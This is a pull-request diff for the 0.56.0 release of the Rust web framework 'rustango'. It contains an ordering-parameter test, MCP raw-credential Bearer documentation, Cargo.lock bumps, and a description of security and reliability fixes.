+    let app = rustango::viewset::ViewSet::for_model(Post::SCHEMA)
+        .page_size(50)
+        .router_pool("/posts", pool);
+
+    seed_divergent(&app).await;
+
+    let resp = app
+        .clone()
+        .oneshot(get("/posts?ordering=secret_score"))
+        .await
+        .unwrap();
+    let body = body_json(resp).await;
+    assert_eq!(
+        ids(&body),
+        vec![3, 2, 1],
+        "with no `fields` restriction every column is exposed anyway"
+    );
+}

--- a/docs/mcp.md
+++ b/docs/mcp.md
@@ -193,7 +193,23 @@ grant_skill_pool(&pool, "acme", "calc-bot", "calculator").await?;
 The client exchanges its credential for a **tenant-pinned, scoped JWT** at
 `POST /mcp/token` (or the OAuth `client_credentials` flow at `/mcp/oauth/token`).
 The server resolves the grant into the token's `skills` + `tools` claims; every
-request re-verifies it. The effect, verified end to end:
+request re-verifies it.
+
+**Or skip the exchange entirely:** the raw `prefix.secret` credential
+itself is accepted as the Bearer token — paste the show-once key straight into
+any MCP client:
+
+```bash
+claude mcp add --transport http my-app https://acme.example/mcp \
+  --header "Authorization: Bearer 3f9c1a2b.7d…"
+```
+
+On the raw-key path the server verifies the secret (argon2, with a short
+process-local cache so the hash isn't recomputed per request), re-checks
+liveness, and resolves grants **on every request** — a user-owned key always
+reflects its owner's live RBAC, and revocation applies immediately instead of
+waiting out a JWT's TTL. Set `[mcp] rate_limit_per_minute` in production to
+bound verification work. The effect, verified end to end:
 
 ```rust
 // tools/list returns ONLY the granted tool, with its JSON Schema:
@@ -350,6 +366,8 @@ enable_sse            = true     # serve the GET {prefix} SSE stream
 allowed_origins       = []       # CORS allow-list (empty = same-origin only)
 rate_limit_per_minute = 0        # per-IP cap (0/unset = unlimited)
 max_tools_listed      = 0        # tools/list page size (0/unset = unlimited)
+max_body_bytes        = 1048576  # JSON-RPC body cap — raise for tools that
+                                 # accept inline payloads (base64 uploads)
 ```
 
 ---

--- a/examples/showcase/Cargo.lock
+++ b/examples/showcase/Cargo.lock
@@ -811,7 +811,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1633,7 +1633,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1710,7 +1710,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1750,7 +1750,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2062,6 +2062,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2072,6 +2073,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -2865,6 +2867,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/examples/showcase/Cargo.lock
+++ b/examples/showcase/Cargo.lock
@@ -2402,9 +2402,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]


### PR DESCRIPTION
Promotes `develop` → `main` for the **0.56.0** release.

Ten commits since the last promote. Verified before opening: `main` holds **no
files and no content** that `develop` lacks, so this merge deletes nothing.
That check matters here — earlier this cycle an MCP feature had been committed
straight to `main` and would have been silently dropped by a promote; it was
rescued onto develop in #1276 and the tree is a strict subset again.

## Contents

Three silent failures — a control reporting success while doing nothing:

- Rate limiting and account lockout did nothing on Redis 6.x (#1280)
- `DistributedLock` had no mutual exclusion on `DatabaseCache` (#1281) —
  measured 13 of 16 concurrent acquirers winning
- `drop_all_pool` failed on MySQL for any schema with FKs (#1277)

Plus CSV formula injection (#1283), `bulk_insert` bind-parameter batching
(#1284), the `?ordering=` allowlist (#1282), `derive(ViewSet)` taking
`Into<Pool>` (#1273), the MCP raw-credential bearer (#1276), sqlx TLS so
managed Postgres/MySQL work at all (#1288), S3 endpoints with a path prefix
(#1289), and `Cargo.lock` becoming tracked (#1287).

**Merge with a merge commit, not a squash** — the promote preserves develop's
individual commits on main.

Tag `v0.56.0` follows on the merge commit, then the four crates publish in
dependency order.
